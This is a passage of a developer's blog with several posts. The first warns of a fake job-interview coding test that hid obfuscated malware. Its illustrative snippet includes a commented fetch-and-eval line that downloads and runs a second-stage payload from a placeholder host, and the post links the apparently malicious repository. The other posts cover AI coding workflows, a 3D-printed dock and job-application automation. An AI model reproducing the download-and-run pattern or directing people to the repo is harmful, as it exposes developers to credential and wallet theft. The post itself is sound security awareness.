Latest Posts (15 found)
David Dodda 1 month ago

How I Almost Got Hacked By A 'Job Interview'

I was 30 seconds away from running malware on my machine. The attack vector? A fake coding interview from a "legitimate" blockchain company. Here's how a sophisticated scam operation almost got me, and why every developer needs to read this.

Last week, I got a LinkedIn message from Mykola Yanchii, Chief Blockchain Officer at Symfa. Real company. Real LinkedIn profile. 1,000+ connections. The works. The message was smooth. Professional. "We're developing BestCity, a platform aimed at transforming real estate workflows. Part-time roles available. Flexible structure."

I've been freelancing for 8 years. Built web applications, worked on various projects, done my share of code reviews. I'm usually paranoid about security - or so I thought. This looked legit. So I said yes to the call.

Before our meeting, Mykola sent me a "test project" - standard practice for tech interviews. A React/Node codebase to evaluate my skills. 30-minute test. Simple enough. The Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock photo of a woman with a tablet standing in front of a house. You know the one.

Here's where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I did what lazy developers do - I started poking around the codebase without running it first. Usually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush. I spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. Ready to run it and show my work.

Then I had one of those paranoid developer moments. Before running anything, I threw this prompt at my Cursor AI agent: "Before I run this application, can you see if there is any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc."

And holy sh*t. Sitting right in the middle of the server-side controller was this beauty: Obfuscated. Sneaky. Evil.
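To make the pattern concrete without reproducing anything dangerous, here's a harmless stand-in of my own (the variable name, bytes, and comments are my invention, not the actual malicious code):

```javascript
// HYPOTHETICAL stand-in, not the real payload: the attack hid a byte
// array like this between legitimate-looking admin functions.
const _0xdead = [104, 116, 116, 112, 115, 58, 47, 47]; // hides "https://" ...

// Decode WITHOUT executing - String.fromCharCode turns the bytes back
// into the URL the loader would fetch its second-stage payload from.
const decoded = String.fromCharCode(..._0xdead);
console.log(decoded); // -> "https://"

// The live version would then have done something like:
//   eval(await (await fetch(decoded + 'payload-host/stage2')).text());
// which runs attacker code with full server privileges.
// Decode and read; never run.
```

Decoding the array in isolation is safe; it's the fetch-and-eval step that hands your machine over.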
And 100% active - embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed. I decoded that byte array - it resolved to a URL. When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything - crypto wallets, files, passwords, your entire digital existence.

Here's the kicker: the URL died exactly 24 hours later. These guys weren't messing around - they had their infrastructure set up to burn evidence fast. I ran the payload through VirusTotal - check out the behavior analysis yourself. Spoiler alert: it's nasty.

This wasn't some amateur hour scam. This was sophisticated:

The LinkedIn Profile: Mykola Yanchii looked 100% real. Chief Blockchain Officer. Proper work history. Even had those cringy LinkedIn posts about "innovation" and "blockchain consulting."
The Company: Symfa had a full LinkedIn company page. Professional branding. Multiple employees. Posts about "transforming real estate with blockchain." They even had affiliated pages and follower networks.
The Approach: No red flags in the initial outreach. Professional language. Reasonable project scope. They even used Calendly for scheduling.
The Payload: The malicious code was positioned strategically in the server-side controller, ready to execute with full Node.js privileges when admin functionality was accessed.

Here's what made this so dangerous:

Urgency: "Complete the test before the meeting to save time."
Authority: LinkedIn verified profile, real company, professional setup.
Familiarity: Standard take-home coding test. Every developer has done dozens of these.
Social Proof: Real company page with real employees and real connections.

I almost fell for it. And I'm paranoid about this stuff. One simple AI prompt saved me from disaster. Not fancy security tools. Not expensive antivirus software. Just asking my coding assistant to look for suspicious patterns before executing unknown code. The scary part?
This attack vector is perfect for developers. We download and run code all day long. GitHub repos, npm packages, coding challenges. Most of us don't sandbox every single thing. And this was server-side malware. Full Node.js privileges. Access to environment variables, database connections, file systems, crypto wallets. Everything. If this sophisticated operation is targeting developers at scale, how many have already been compromised? How many production systems are they inside right now?

Perfect Targeting: Developers are ideal victims. Our machines contain the keys to the kingdom: production credentials, crypto wallets, client data.
Professional Camouflage: LinkedIn legitimacy, realistic codebases, standard interview processes.
Technical Sophistication: Multi-layer obfuscation, remote payload delivery, dead-man switches, server-side execution.

One successful infection could compromise production systems at major companies, crypto holdings worth millions, personal data of thousands of users. If you're a developer getting LinkedIn job opportunities:

Always sandbox unknown code. Docker containers, VMs, whatever. Never run it on your main machine.
Use AI to scan for suspicious patterns. Takes 30 seconds. Could save your entire digital life.
Verify everything. A real LinkedIn profile doesn't mean a real person. A real company doesn't mean a real opportunity.
Trust your gut. If someone's rushing you to execute code, that's a red flag.

This scam was so sophisticated it fooled my initial BS detector. But one paranoid moment and a simple AI prompt exposed the whole thing. The next time someone sends you a "coding challenge," remember this story. Your crypto wallet will thank you. If you're a developer who has run "coding challenges" from LinkedIn recruiters, you should probably read this twice.

https://bitbucket.org/0x3bestcity/test_version/src/main/ - not sure how long this will stay up though.

David Dodda 2 months ago

Laughing in the Face of Fear: How I Accidentally Rewired My Brain Through Movies

"Why do you keep smiling?" My friend's puzzled voice cut through the theater's surround sound as yet another jump scare filled the screen. I hadn't even realized I was doing it. There I was, grinning like an idiot while a demon wreaked havoc on screen - the same kind of creature that would have sent me diving behind couch cushions just a few years ago. "That demon is kind of cute," I whispered back, and immediately wondered where those words had come from. Walking out of that Conjuring: The Last Rites screening, I couldn't shake the question: when did I stop being afraid of horror movies? More importantly, how did it happen without me even noticing? I've always been a scaredy-cat. Horror movies were my kryptonite, the kind of films that left me sleeping with the lights on and checking under beds like a paranoid child. So this newfound ability to chuckle at cinematic terror felt like discovering I could suddenly speak a foreign language. As I reflected on this mysterious transformation, three influences kept surfacing in my memory, all carrying the same powerful message: fear loses its grip when you laugh at it . The first was Stephen King's IT , specifically the scene where the Losers Club finally confronts Pennywise. These kids, terrorized by an ancient cosmic horror, make a crucial discovery: the creature that feeds on fear becomes pathetically small when mocked. They literally bully the bully, turning their terror into ridicule. "You're just a clown!" they shout, and suddenly this omnipotent force becomes just another playground antagonist. The second was from Harry Potter and the Prisoner of Azkaban . Professor Lupin teaches his students to defeat boggarts, creatures that manifest as your worst fear, with the Riddikulus spell. The magic isn't in complex incantations; it's in forcing yourself to imagine your fear in something ridiculous. Snape in your grandmother's dress. A spider wearing roller skates. Fear transformed into comedy. 
The third influence was more gradual but perhaps most impactful: discovering Wendigoon's YouTube channel. Here was someone who approached the most unsettling horror content - creepypastas, urban legends, true crime - with genuine curiosity and often infectious humor. Watching him dissect a terrifying story with the enthusiasm of a literature professor made me realize that scary content was just content. When you pull back the curtain and analyze the mechanics of horror, the monsters become fascinating rather than frightening. His approach taught me that you could respect the craft of scary storytelling while refusing to be intimidated by it.

All three sources delivered the same revolutionary idea: laughter is fear's kryptonite. Without realizing it, these influences had planted something in my subconscious. They'd offered me a new framework for processing scary situations - not as threats to flee from, but as puzzles to solve or absurdities to find amusing. The demon in The Conjuring: Last Rites wasn't a harbinger of nightmares; it was just another creature stumbling through its prescribed horror-movie beats, probably worried about hitting its jump-scare quotas.

This shift represents something profound about how we consume media. Stories don't just entertain us; they literally rewire our neural pathways, teaching us new ways to interpret and respond to the world. Every hero's journey we follow, every coping mechanism we witness, becomes part of our own psychological toolkit.

The beautiful thing about this accidental transformation is how it's changed my relationship with fear beyond just movies. That presentation at work that used to paralyze me? Now I picture the audience in their underwear - not because someone told me to, but because I've learned that fear shrinks under the spotlight of absurdity. The anxiety-inducing news cycle?
Sometimes I can step back and see the cosmic comedy in our collective human drama, the way we all scramble around taking ourselves so seriously on this tiny rock spinning through space.

This doesn't mean becoming callous or dismissing real dangers. It means developing the superpower to choose your response to fear, to ask yourself whether this particular monster deserves your terror or your chuckles. Maybe the most magical thing about both IT and Harry Potter isn't the supernatural elements; it's the reminder that we have more control over our inner landscape than we think. Every day, we're casting spells on ourselves with the stories we tell, the media we consume, the frameworks we adopt for making sense of the world.

Sometimes, without even realizing it, we learn to laugh in the face of fear. And once you've done that, you discover something wonderful: most of our demons are just wearing costumes, waiting for someone brave enough to point and giggle. Riddikulus, indeed.

David Dodda 4 months ago

Most AI Code is Garbage. Here's How Mine Isn't.

Note: All the exact prompts and templates I used are included at the bottom of this article, plus a link to get even more prompts.

Most developers spend months building their application, only to realize at the end they want to burn everything down and start over. Tech debt, they call it. I haven't met a single developer who hasn't felt the urge to rewrite everything from scratch. In the age of AI, this pain hits faster and harder. You can generate massive amounts of code in days, not months. The siren call to rewrite comes in weeks instead of months, sometimes even days.

But here's the thing - I just spent the past 5 weeks shipping a project with over 100k lines of backend code, spread across more than 10 backend services, and I haven't felt the call to rewrite it. Not once. The total cost? $450 in AI credits over 3 weeks of intense development. The result? A production-ready backend that I'm actually proud of.

Here's exactly what made this possible: 4 documents that act as guardrails for your AI.

Document 1: Coding Guidelines - Every technology, pattern, and standard your project uses
Document 2: Database Structure - Complete schema design before you write any code
Document 3: Master Todo List - End-to-end breakdown of every feature and API
Document 4: Development Progress Log - Setup steps, decisions, and learnings

Plus a two-stage prompt strategy (plan-then-execute) that prevents code chaos. This isn't theory. This is the exact process I used to generate maintainable AI code at scale without wanting to burn it down. But first, let me show you exactly why this framework is necessary...

Here's the brutal truth: LLMs don't go off the rails because they're broken. They go off the rails because you don't build them any rails. You treat your AI agent like an off-road, all-terrain vehicle, then wonder why it goes off the rails. You give it a blank canvas and expect a masterpiece.
Think about it this way - if you hired a talented but inexperienced developer, would you just say "build me an app" and walk away? Hell no. You'd give them:

Coding standards
Architecture guidelines
Project requirements
Regular check-ins

But somehow with AI, we think we can skip all that and just... prompt our way to success. The solution isn't better prompts. It's better infrastructure. You need to build the roads before you start driving.

I spent about a week creating these four documents before writing a single line of application code. Best week I ever invested. These aren't just documents - they're the rails that keep your AI on track. Every chat I open in my IDE includes these four docs as context.

Document 1: Coding Guidelines

This document covers every technology you intend to use in your project. Not just a list of technologies - the actual best practices, code snippets, common pitfalls, and coding style choices for each technology. Here's what mine included:

Setup and architectural conventions
Folder and file structure standards
ESLint configuration and rules (Airbnb TypeScript standards)
Prettier configuration for code formatting
Naming conventions for variables, methods, classes
Recommended patterns for controllers, services, repositories, DTOs
Testing standards with Jest
CI/CD pipeline setup guidelines

You can generate this document using ChatGPT with research mode on. I used a detailed prompt that asks for comprehensive guidelines covering setup conventions, coding standards, tooling integration, testing standards, and CI/CD practices. (See the exact prompt at the bottom of this article.)

How to use this document:

Give it to your Cursor agent to generate rulesets for your project (creates rule files in your project)
Include it as context with every request you make

I did both. The second option will increase your bill, but the results are worth it.

Document 2: Database Structure

You need a strong database design for the AI to build off. No shortcuts here.
Use an LLM to create this structure by giving it your application scope and asking it to generate the database design. But you must review the database structure against your requirements and make sure it can handle all the features you want to build. I use a 4-phase prompt approach: entity identification, table structure definition, constraints and indexes, and finally DBML export for visualization. (Complete prompts are at the bottom.)

At the end, you should have a DBML file (used by most database visualization tools). This becomes your single source of truth. Every API, every feature, every data operation references this structure.

Document 3: Master Todo List

This is an end-to-end list of all the tasks you need to finish to build your application, from start to finish. It doesn't have to be just a todo list. I created an API todo list with every API I need for my frontend to function. It outlined the entire application scope. You can reference content from the database structure in this document to ensure everything aligns. I use another 4-phase approach here: feature area breakdown, API endpoint definition, implementation task creation, and task organization with prioritization. (Detailed prompts at the bottom.)

Pro tip: Keep this document updated as you complete tasks. It becomes a progress tracker and helps prevent scope creep.

Document 4: Development Progress Log

This contains the steps you took to set up your project, the file structure, the build pipeline, and any other crucial information. If you used an agent to set up your project, just ask it to create this document for you. The prompt covers setup and foundation, implementation decisions, build and deployment processes, and learnings from issues encountered. (Full prompt template at the bottom.)

The Magic: These 4 documents get added to every chat I open in my IDE. Yes, the context might be large, but Cursor will "significantly condense it to fit the context."
As you develop new features and finish tasks in your todo list, make sure you ask the agent to update all your docs (todo list, development progress).

Thinking models have come a long way, but thinking alone isn't enough. I use a two-stage prompt approach for every feature or task:

Stage 1: Plan
Stage 2: Execute

The advantage of this two-stage approach is that you get to review the plan, not the code. When you review the plan, after execution you're just verifying that the generated code matches the plan - which is much easier than reviewing code. This also grounds the agent to execute only on the current plan, preventing it from going off the rails. Here's how it works in practice:

Planning Stage: "I need to build user authentication. Create a detailed plan for implementing this feature, including all the files that need to be created/modified, the database changes required, and the API endpoints needed."
Review: I review the plan, make adjustments, approve it.
Execution Stage: "Execute the plan we just created. Implement the user authentication feature exactly as outlined in the plan."

This simple change transformed my development process. No more surprise architectural decisions buried in generated code.

Let me be honest about what really happens when you implement this framework.

Code Quality: The generated code actually follows your standards. No more random variable names or inconsistent patterns.
Maintainability: When you come back to code after a week, you can actually understand it because it follows your documented patterns.
Speed: Once the framework is set up, feature development is blazingly fast. The AI has clear rails to run on.
Confidence: You stop second-guessing every piece of generated code because you know it was built to your specifications.

Documentation Drift: Even if you're updating docs after every chat, they will always slip from the actual code.
I set aside a couple of hours every few days to review the docs and sync them up with the code. I use a 4-phase documentation sync process: git diff analysis, gap analysis, critical updates, and validation. (Complete sync prompts at the bottom.)

Context Window Costs: Including these documents in every chat increases your bill. But honestly, it's worth every penny for the quality improvement.
Setup Time: That initial week of document creation feels slow when you just want to start coding. But it pays dividends later.
Maintenance Overhead: You need to actually update these documents as your project evolves. Skip this and you're back to chaos.

Here's the mindset shift that changes everything: you're no longer a developer. You're a manager of AI developers. And like any good manager, you need to solve the productivity challenges of your team. Nothing kills developer productivity like waiting for your AI agent to finish executing. I've found two approaches to handle this:

1. Develop the near-impossible skill of watching paint dry. Don't feed your brain with YouTube shorts, Twitter scrolling, or blog reading. Just stare at the content being generated and review code when you have enough to review. It's harder than it sounds. But it works.

2. Work on multiple tasks at once. But since growing extra heads isn't an option, you need the oldest cybernetic augmentation known to humanity: pen and paper. Dump all the context needed for a task onto paper. This helps with context switching and lets you get more done. When the agent is working on one task, you switch to another. You're going from the mindset of individual contributor to managing a team of semi-proficient interns.

What about timelines? We're screwed here. I haven't found a working solution for estimating timelines in the AI age. All I know is that setting timelines is hard and gets exponentially harder when you throw AI into the mix.
Here's something funny: when I use my two-step plan-execute approach, sometimes the LLM adds timelines to the end of the plan. They range from a couple of weeks to a couple of months. But in practice, it usually takes the LLM about 30-60 minutes to execute most tasks. There's a joke about middle management killing productivity somewhere in there.

If you want to get good at using AI for coding, learn from the community. I took inspiration from random comments on the r/cursor subreddit and different blog articles on Hacker News. (Shout out to Harper Reed and his "My LLM codegen workflow atm" blog, where I picked up the two-stage plan-execute idea.)

The framework works. The 4-document approach creates the rails your AI needs to stay on track. The two-stage prompting keeps features focused and reviewable. As LLMs get cheaper and better, this stuff gets easier. Right now, Claude 4.0 is my go-to model for most tasks. I use o3 when I need to debug really nasty bugs. Tool calling is going to be crucial for coding tasks in the future. I'm also looking forward to text diffusion models getting good.

Stop treating AI like magic. Start treating it like the powerful but inexperienced team member it is. Give it structure, give it guidance, and watch it build something you're actually proud of. Follow for more articles like this. I have a few more AI/LLM related pieces in the pipeline.

Here are all the exact prompts I used in this article.
For even more advanced prompts and templates, check out my complete collection: Get Advanced AI Coding Prompts (Free)

David Dodda 6 months ago

Building Complexity from Simplicity: An Interactive Web Experiment

Have you ever looked at something visually complex and wondered, "How in the world did they do that?" What if I told you that behind some of the most mesmerizing visual interactions, there's often just a handful of simple rules? Recently, I crafted a simple web experiment called Snake Eyes, aiming precisely at that: transforming basic, straightforward rules into something surprisingly beautiful and engaging. Let's dive into how this works.

Imagine a grid of squares, each containing a smaller circle. Here are the rules governing each square:

Attraction: The circle within each square moves slightly toward your cursor when you move your mouse around.
Scaling Animation: When you click anywhere on the screen, the circles scale up briefly, creating a wave-like animation.
Color Cycling: Every click also cycles the colors of the circles and the background in a coordinated manner, producing vibrant visual feedback.

These rules, individually, are easy to grasp. There's nothing complicated here, just position tracking, scaling animations, and color changes.

Circle Movement: Each circle calculates its distance from your cursor. The closer your cursor, the more significant the pull towards it. Farther circles barely move, while nearer ones noticeably shift.
Wave Effect: When clicking, circles animate outward from the click position. The animation delay is directly proportional to their distance from your click, creating a fluid, rippling wave effect.
Dynamic Colors: With each click, the circles change color in sequence, and the background shifts subtly to a complementary shade, ensuring harmony and contrast.

Here's the magic: when you multiply these simple interactions across dozens or even hundreds of elements, complexity emerges naturally. The interplay of movement, timing, and color creates visually captivating patterns far greater than the sum of their parts.

Less is More: Even minimal rules can produce rich, engaging visuals.
Timing Matters: Smooth, carefully timed animations create appealing interactions.
Harmony in Design: Complementary colors and coordinated animations enhance the overall visual experience significantly.

Exploring these interactions first-hand is not only fun but also inspiring. By experimenting with simple rulesets and basic animations, you'll discover just how powerful and creative simplicity can be. So, next time you marvel at something visually complex, remember: complexity often starts with simplicity, just scaled, repeated, and beautifully orchestrated.

Link to the experiment - https://daviddodda.com/experiments/snake-eyes.html
Link to the code - https://github.com/daviddodda1/developer_portfolio_minimal/blob/main/experiments/snake-eyes.html
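The three rules boil down to a few pure functions. This is a simplified sketch of the idea, not the actual experiment code (parameter names and constants are my own):

```javascript
// Simplified sketch of the Snake Eyes rules (not the actual experiment code).

function circleOffset(circle, cursor, maxPull = 8, falloff = 200) {
  // Rule 1: attraction - the closer the cursor, the stronger the pull.
  const dx = cursor.x - circle.x;
  const dy = cursor.y - circle.y;
  const dist = Math.hypot(dx, dy) || 1; // avoid divide-by-zero at the cursor
  const pull = maxPull * Math.max(0, 1 - dist / falloff);
  return { x: (dx / dist) * pull, y: (dy / dist) * pull };
}

function waveDelay(circle, click, msPerPixel = 0.5) {
  // Rule 2: the scale-up animation starts later the farther the circle
  // is from the click, which is what produces the ripple.
  return Math.hypot(click.x - circle.x, click.y - circle.y) * msPerPixel;
}

function nextColor(index, palette) {
  // Rule 3: every click advances each circle one step through the palette.
  return palette[(index + 1) % palette.length];
}
```

Run these per element on every frame (or click) and the emergent wave and color behavior comes for free.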

David Dodda 10 months ago

From 3D Modeling Noob to Building the Perfect Phone Dock

Hey, quick story about how I created my perfect phone dock. So I'm scrolling YouTube one day and stumble across this slick iPhone standby dock by Scott. Clean design, wireless charging, even a spot for AirPods. Love it. Only problem? I've got an Android.

Perfect chance to level up my 3D modeling skills. I'm still a beginner with Onshape, but hey - the best way to learn is to build something you actually want, right? So I fired up the software and started modeling.

On my first attempt I built this chunky brick with a solid back wall. Looked decent, had spots for the phone and my Mi Watch. But it had one big downside - my Motorola Edge supports 50W wireless charging. Sounds great until you realize what happens when you pump that much power through a wireless charger... The whole thing hit 85-90°C at the hottest parts, and the PLA plastic started to soften and sag where it came in contact with the charging puck. Not ideal when you're trying to work and your phone dock is slowly morphing into modern art.

Version 2 got smarter. Added ventilation slots, even designed spots for 30mm cooling fans. I know it's overkill. But sometimes you gotta go big before you can go home. Turns out just dropping the charging power solved the heat issue (you just use a low-wattage charging brick). Classic over-engineering.

But the story doesn't end there. I upgraded my watch to this cool open-source Bangle.js that lets you run your own applications that you write in JavaScript. But it has a different charging mechanism that's not compatible with the version 2 dock. So, one more major iteration. This time I didn't want it to take up too much space or be bulky - something that's really simple.

Here's the 3rd version of the dock: considerably smaller footprint, takes way less material to print, and has vents only at the charge coil. I also moved the charge area to the front of the dock instead of the top. It has decent cable management too.
On Android you don't have a standby dock mode, so I use this app called StandbyDock Pro (one-time payment, none of that subscription nonsense). Now I've got this whole command center setup - calendar, music controls, and some really cool clocks.

Want to build your own? I'll drop the 3D models and Onshape project links below. The Onshape project is parametric, so you can tweak it for whatever phone/watch combo you're running.

Onshape link - https://cad.onshape.com/documents/d94f0a5e3dbdc238eee0df12/w/20a0c54cbcca88e40ed6379d/e/1c566268f8cf71fcad356f0f
Thingiverse (STL files) - https://www.thingiverse.com/thing:6930050
Android app - https://play.google.com/store/apps/details?id=br.com.zetabit.ios_standby&hl=en_IN&pli=1

I am a noob when it comes to 3D modeling, so I know this is not the perfect version. I got it to a place where I am happy using it on my desk. That's it - catch you in the next one.

PS: this was an old project I did, just getting around to writing about it. I have something really good cooking up using AI. Watch out for that announcement soon.

David Dodda 10 months ago

How I Automated My Job Application Process. (Part 3)

Welcome to the final part of this series. In Part 1, I showed you the proof of concept. In Part 2, we dove into the actual application. Now it's time for the good stuff - all the ways everything went wrong before it went right.

Remember when I said the email system deserved its own article? Well, here it is. It's a story of hubris, AWS rejections, and what happens when you try to run your own email server. (Spoiler: Nothing good.) I wanted something simple: a system that could send and receive emails programmatically and provide a decent UI to view sent emails and reply to incoming emails. Here's how that "simple" requirement turned into a two-week adventure.

First thought: "I'll just use Gmail's SMTP server!"

Their API documentation is a nightmare
You need to use OAuth 2.0 to authenticate and make API requests
They're really not fond of automated emails
Even their business accounts have strict limits

The real kicker? This used to be dead simple. Back in the day, you just had to enable the "less secure apps" option in your account settings, and boom - you could fire off emails using your username and password with nodemailer. No OAuth dance, no security theater, just simple SMTP auth. But Google killed that flow, and now we're left with a more complex setup that takes way more time to get running.

Next thought: "Fine, I'll use ProtonMail - they're privacy focused!"

Requires a business account
Need to submit a request form
Have to get approved for SMTP access
Spoiler: They don't approve automation use cases

AWS seemed perfect:

Built for programmatic email sending
Great documentation
Reasonable pricing
Even handles incoming mail via S3 buckets

I built a whole system around it:

Outgoing emails through SES
Incoming emails saved to S3
Lambda function to process responses
MongoDB to track everything

It worked beautifully in testing. Then I applied for production access... Turns out "I want to send automated job applications" isn't what they want to hear. Who knew?
"Fine," I thought, "I'll run my own email server. How hard can it be?" (Those words should be engraved on every developer's tombstone.) I found this great tool called Mailcow that handles everything:

- SMTP server
- IMAP support
- Web interface
- Spam filtering

The setup process was actually smooth:

1. Spin up a server (I used an EC2 instance here)
2. Configure DNS records
3. Set up Mailcow
4. Open the required ports...

Oh wait. AWS blocks SMTP ports by default. You have to request access. And guess what their response was? Back to the drawing board.

Okay, no AWS. I'll use a regular VPS where I have full port access! Got Mailcow running on a cheap VPS I grabbed during the Black Friday sales. Everything looked good:

- Server up and running
- All ports open
- DNS configured
- TLS certificates in place

I could receive emails! Victory! ...but I couldn't send any. And honestly? I never figured out why. The server was configured, the ports were open, everything looked right on paper - but no emails would go through. After countless attempts and configuration tweaks, I did what any sane developer would do: I shelved the entire project. At this point, I had sunk two weeks into this email adventure with nothing to show for it. It was time to step back and rethink everything.

Then one day, while taking a break from this project, I came across a video by Joe Barnard (the BPS.space guy): "A rant on personal engineering projects". In it, he makes this brilliant point about the difference between company projects and personal projects. In a company, you optimize for things like cost, scalability, and perfect systems integration. But with personal projects? Your biggest challenge isn't making it cheap or efficient - it's actually finishing the damn thing. He talks about how in a company, if one approach fails, you can buy another solution, hire consultants, or modify the requirements. But in a personal project, you're the only one responsible for everything.
Your biggest risk isn't going over budget - it's the project never getting done at all. So I did what I should have done from the start:

- Used Mailgun for sending emails
- Set up their inbound routing to forward replies to my regular email
- Added my email as BCC on all applications
- Called it a day

Was it the most elegant solution? No. Was it the cheapest? No. Did it work? Yes. Did it get me over the finish line? Also yes. In the end, I sent out about 250 job applications in 20 minutes. Total cost? About $5 in API fees.

The irony? I got a job offer before I even finished the project. Not from the automated applications - turns out networking still works better. But here's the real plot twist: talking about this project during my technical interview actually helped land me the job. When they asked about challenging projects I'd worked on, I walked them through everything - the script execution system, the data pipeline, the email server saga. Nothing demonstrates your technical chops quite like explaining why you spent two weeks trying to run your own SMTP server before admitting defeat. Sometimes the projects that don't quite work out teach us the most valuable lessons - and make for the best interview stories.

Start with the boring solution
- If something's been solved, use that solution
- Your clever idea probably isn't worth the trouble
- Every "I'll just build it myself" decision needs serious justification

Define "good enough"
- Perfect email deliverability isn't needed for a personal project
- You can forward emails instead of building an inbox
- Sometimes BCC'ing yourself is the right solution

Know when to quit
- Two weeks on email infrastructure was too long
- "I've already spent X time on this" is a trap

The best solution is the one that ships
- A working project beats a perfect plan
- You can always improve it later
- Sometimes "later" means "never," and that's okay

Could this project be better?
Absolutely:

- The email generation could be batched to reduce API costs
- The UI could be prettier
- LinkedIn integration would be nice
- Job board scraping could be automated

Will I do any of that? Probably not. I have a job now, and more importantly, I learned what I needed to learn. The code lives at jaas.fun if you want to check it out. Feel free to fork it, improve it, or use it as a cautionary tale about overengineering. And if you're applying for jobs right now and want to use this tool, message me on LinkedIn or email me at [email protected]. If enough people need it, I might even turn it into a proper product.

Even though I landed a job (starting in a few days!), I'm not done building things. Nights, weekends, and that sweet spot between coffee and sleep? That's building time. My next project tackles another part of the job hunt puzzle: "Pimp My Resume" - a tool for enhancing and auto-customizing your resume for specific job listings. Because if you thought automating job applications was fun, wait until you see what happens when we let AI loose on resume optimization. Stay tuned. This one's going to be interesting.

Thanks for following this series! If you want to talk about job automation, overengineering, or making personal projects that actually ship, find me on Twitter or LinkedIn.
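For the curious, the "boring solution" really is only a few lines. Here's a hedged sketch of sending through Mailgun's HTTP messages endpoint with stdlib urllib - the domain, API key, and addresses are placeholders, not the real jaas.fun config:

```python
import base64
import urllib.parse
import urllib.request

MAILGUN_DOMAIN = "mg.example.com"    # placeholder, not a real sending domain
MAILGUN_API_KEY = "key-placeholder"  # placeholder

def build_payload(to: str, subject: str, text: str, bcc: str) -> dict:
    # BCC'ing myself on every application = a free "sent" folder.
    return {"from": f"applications@{MAILGUN_DOMAIN}", "to": to,
            "bcc": bcc, "subject": subject, "text": text}

def send(payload: dict) -> None:
    # Mailgun's messages endpoint takes a form-encoded POST with
    # HTTP basic auth, username literally "api".
    url = f"https://api.mailgun.net/v3/{MAILGUN_DOMAIN}/messages"
    req = urllib.request.Request(url, data=urllib.parse.urlencode(payload).encode())
    token = base64.b64encode(f"api:{MAILGUN_API_KEY}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    urllib.request.urlopen(req)  # fires the actual request

payload = build_payload("recruiter@example.com", "Application: Backend Developer",
                        "Hi - resume attached.", bcc="me@example.com")
```

The `bcc` field is the whole trick: a paper trail of every application without building an inbox.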

David Dodda 11 months ago

How I Automated My Job Application Process. (Part 2)

Welcome back! In Part 1, I showed you how I built a proof of concept to automate job applications using Python scripts. Now it's time for the fun part - turning those scripts into a proper application. Here's what I learned: the gap between "it's a working POC" and "it's a real application" is where dreams go to die. But we're going to cross that gap anyway.

Those Python scripts evolved into different script types in the application, each handling a specific part of the process. Every job search became a "campaign" with its own pipeline. Here's how it works:

1. Raw HTML Storage: You dump in raw HTML from job boards
2. Initial Cleanup: A script turns that mess into structured JSON
3. Job Fetching: Another script hits each job URL and grabs the full posting (with polite delays between requests because we're not savages)
4. Job Data Cleaning: This script uses AI to turn job postings into clean, structured data including:
   - Contact email
   - Application instructions
   - Full job description in markdown
   - Additional metadata (salary, location, requirements)
5. Email Generation: Takes your resume + job data and crafts personalized applications that don't sound like they came from a robot
6. Email Sending: The final step that actually gets your applications out the door

Each campaign is isolated. While a campaign can only run one script at a time (like going from cleanup to fetching to email generation), different campaigns run independently. Think of it like having multiple assembly lines - if one line stops, the others keep humming along. A script breaking in one campaign won't mess with jobs running in another.

I could tell you I chose each piece of technology after careful consideration of all possible options. But the truth? I went with what I knew would get the job done:

- Frontend: Next.js with Shadcn for UI components
- Backend: Express.js and Node.js (with TypeScript)
- Database: MongoDB for the job data
- Queue system: Redis for background jobs
- AI integration: Modular setup supporting multiple providers

The application lives at jaas.fun (Job Application Automation System - I'm great at names, I know).
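To make the cleanup step concrete, here's an illustrative sketch (the field names and helpers are my guesses, not the actual jaas.fun code): it shrinks the stored HTML and emits the kind of structured JSON the later stages expect:

```python
import json
import re

def minify(html: str) -> str:
    # Drop script/style blocks and comments, then collapse whitespace -
    # the kind of pass that makes a stored job page dramatically smaller.
    html = re.sub(r"<(script|style)\b.*?</\1>", "", html, flags=re.S | re.I)
    html = re.sub(r"<!--.*?-->", "", html, flags=re.S)
    return re.sub(r"\s+", " ", html).strip()

def cleanup(raw_jobs: list) -> str:
    # Normalize scraped rows into structured JSON for the pipeline.
    cleaned = []
    for job in raw_jobs:
        cleaned.append({
            "job_id": str(job.get("id", "")).strip(),
            "title": job.get("title", "").strip(),
            "url": job.get("link", "").strip(),
            "html": minify(job.get("html", "")),
            "salary": job.get("salary"),  # keep missing fields explicit (null)
        })
    return json.dumps(cleaned, indent=2)

raw = [{"id": " 42 ", "title": "Backend Dev ",
        "link": "https://example.com/jobs/42",
        "html": "<div> <script>track()</script> <h1>Backend  Dev</h1> </div>"}]
structured = json.loads(cleanup(raw))
```

Missing fields stay as explicit nulls so the error handling downstream can catch them early instead of guessing.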
Each campaign in the system is completely isolated. This was crucial because:

- Different job boards need different scripts
- Rate limits hit at different times
- You want to test new approaches without breaking existing ones

The campaign schema tracks everything:

- Raw HTML from job boards
- Cleanup scripts
- Generated JSON
- Email templates
- Processing status

Each type of script gets specific functions based on its role:

- Cleanup scripts: access to read raw HTML and save cleaned JSON
- Fetch scripts: network access to job boards and data storage
- Email generation scripts: access to AI models and resume data
- Email sending scripts: access to email services and campaign status updates

No script can access functions outside its type - a cleanup script can't send emails, and an email script can't fetch new jobs. It's like giving each worker exactly the tools they need, nothing more.

This is where things get really interesting. Remember how we need to run untrusted code (our cleanup and processing scripts) safely? Enter the script execution system. Here's how it works: each script gets queued in Redis with:

- Campaign ID
- Script type (cleanup, fetch, email generation)
- Script content

A worker process runs continuously, waiting for new jobs. It creates a sandboxed environment for each script. Why? Because running arbitrary JavaScript is dangerous, and I enjoy sleeping at night. Each script runs in its own sandbox with:

- A custom logger that streams output to Redis
- Access to only its input data
- Complete isolation from the main system
- No artificial time limits (because processing 100 jobs takes longer than processing 1)

The logging system is pretty neat. Instead of writing to files or console, every log message gets:

- Timestamped
- Stored in Redis by campaign and script type
- Streamed back to the UI in real-time

The best part? The whole thing is crash-proof. If a script fails, the campaign gets marked as failed but nothing else breaks. If the worker crashes, it restarts and picks up where it left off.
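The crash-proof behavior is easier to see in code. Here's a toy version of that worker loop - an in-memory queue standing in for Redis, a dict standing in for the campaign schema, and names that are mine rather than the real system's:

```python
import queue

jobs = queue.Queue()
campaign_status = {}

def worker_step() -> bool:
    """Process one queued script. A failure marks only its own campaign
    as failed; the loop keeps running. Returns False when the queue is
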